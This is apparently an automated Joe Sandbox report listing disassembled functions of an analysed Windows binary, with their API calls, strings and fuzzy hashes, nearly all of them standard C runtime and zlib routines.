Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 625ac85325962cda5a6fd4c75934b7fa954b022cbb821c6a6661f7e51c7a068f
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: D7311D7260CB81CAEB64AF60E8913EE63A4FB84744F44403ADA4E87B98DF79D548C710

Function 00007FF644895C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF644895C45

Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC

Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

Part of subcall function 00007FF64488A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A909
Part of subcall function 00007FF64488A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A92E

_get_daylight.LIBCMT ref: 00007FF644895C34

Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C

_get_daylight.LIBCMT ref: 00007FF644895EAA
_get_daylight.LIBCMT ref: 00007FF644895EBB
_get_daylight.LIBCMT ref: 00007FF644895ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: 145fb6830e9407938e35f84bf17f59a8f148022e2e1c5078413f6604dd990ddb
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: 10D1A123A1CA428EE764BF25D8D21B96B51EF84B94F448135EE0DC7A9EDF3EE4418740

Function 00007FF64488A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF64488A68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64488A6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF64488A6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF64488A719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64488A723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF64488A72E

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: dca020750825312e0512b41a023a55c1df99d0a722e480da8df9dcd5d666469b
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: CF31513660CF8189EB64EB65E8812AE73A4FB84754F540135EE9D83B98DF3DD145CB00

Function 00007FF644891874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448918C0
FindFirstFileExW.KERNEL32 ref: 00007FF6448919CA

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: 42465edde9679dc7cdadb9c7c662bb0e002e8e86ee19168b88f6c310d7881357
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 5FB1C522B1CA9289FA61BB6199821B96391EF44BE5F445131EE5D87BCDEF3DE441C300

Function 00007FF644895E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF644895EAA

Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C

_get_daylight.LIBCMT ref: 00007FF644895EBB

Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC

_get_daylight.LIBCMT ref: 00007FF644895ECC

Part of subcall function 00007FF6448955C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955DC

Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: 0efd6df8aaa5e2b1059a6020ef1ebdec738c6e2cd5ea03de9292157ad21c3828
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: 98514D32A1CA828EE760FF25E8D25A96761FF88794F404135EE4DC7A9ADF3DE4418740

Function 00007FF64487D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF64487D03C
GetCurrentThreadId.KERNEL32 ref: 00007FF64487D04A
GetCurrentProcessId.KERNEL32 ref: 00007FF64487D056
QueryPerformanceCounter.KERNEL32 ref: 00007FF64487D066

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 5b4465ad599c622c6c306571a197281bc630650e0555362a133ebd215f61e20f
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: D6110A22B18F05CAEB00AB60E8952B933A4FB59B58F441E31DE6D86BA8DF78D1548340

Function 00007FF644893C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF644893C76
memcpy_s.LIBCPMT ref: 00007FF644893CA1

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: c19829dff14776a66f670340b45933963283610047bd608856b24642a6392a2d
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: D7C1D672B1CA86CBD724EF15A08566AB791F788B84F448135DF4A83758DF3EE801CB40

Function 00007FF64487A47B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

, xrefs: 00007FF64487A55B
header crc mismatch, xrefs: 00007FF64487A921
unknown header flags set, xrefs: 00007FF64487A4C5

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
Instruction ID: 7af50af0513e55ba3daf59a84b5b74b4205ed6dd27453a187539f5bb9d006921
Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
Instruction Fuzzy Hash: 7FF19F76B0C2C58EE7A5BB18C8E9A3A3AA9EF44744F054138DE4987798DF3CE440DB40

Function 00007FF644899728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF644899977
RaiseException.KERNEL32 ref: 00007FF644899988

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: 104b87b95f272d74c55f722347b658c1f9282c76e660145929913e580e2caf4d
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: 74B11A77A08B89CEEB15DF29C8863687BA0F784B48F158925DE5D877A8CF3AD451C700

Function 00007FF6448839A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF644883B12
, xrefs: 00007FF644883D54

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: 1d61e69d8dfd9c5b978d3e0dc04578c73920fea14eb13f56235c8719ae981d8e
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: F8E18472A0CA468AEB68BF2581D213D33A1FF45B48F146135DE4E87799DF2BE891C740

Function 00007FF64487A2DB Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF64487A449
incorrect header check, xrefs: 00007FF64487A462

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
Instruction ID: 5c1efce6c8a0ebef264172932663f33449ee4d461f2f212bd3d88037343c116a
Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
Instruction Fuzzy Hash: 8391B672B1C2858FE7A5BF14C8E9B3E3AA9FB44354F114139DE5A86689DF38E540CB00

Function 00007FF64488DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF64488E07A
e+000, xrefs: 00007FF64488DFFD

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: dc10c20fcf710afe9feed4c40d406436835f27fd55ff699b12b4216d3ddea0a7
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: 4B516822B1C2C58AE725BE3598827696B91F744B94F488231CF98CBACACE7DD440C700

Function 00007FF6448908C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction ID: 3fd9c301068c19d2c47e37ad177e51068fe356b0785b1b6ac0d608d770b16040
Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction Fuzzy Hash: B902B321B1EE47CDFA56BB11A8C72796680AF46BA0F454634ED6DC63DADF3EE4418300

Function 00007FF64488DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF64488DD9E

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: b4698f5e693a508abb366eebd1bb4a1250f1e38f72cd7e512d712f164574903a
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 0EA13763A0C7CA8BEB21EF25A4817AD7BD1AB65B84F058131DE4D8778ADE3DE501C701

Function 00007FF644888794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6448887B3

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction ID: a18e655ac1ad4da0ca3746df9003b3fa00f12c5080554a177aa0ce4de43277e6
Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction Fuzzy Hash: BF51DE11F1DA0B4AFA69BB27598317A5290AF84BD4F498434DE1EC77DEEE3CF4429200

Function 00007FF644893480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF644893484

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction ID: d7c5b836f7f6349558e39380ebbc41070f96a1087c6f6748ce252b4a152a49da
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: 6CB09220E0BA42CAEA093B616CC321822A5BF88701F980138C80D80334DE2C64E59700

Function 00007FF6448835A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: 01baa0a6f4b887f54b5742b4c3523d4a15af8fb3b753fc73b05525eb56c677e2
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: 56D1A372A0C6468AEB69FE29849227D27A0EF05B48F146235CE0D87799DF3FE845D740

Function 00007FF644879800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: 5676076d6b1eac24e9e1e842d04933dad91d31ee8234f73b290ead182a7df030
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: 59C17E762181E08BD289EB29E8B947A73E1F78930DB95406BEF8747785CA3CE514DB10

Function 00007FF644882C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
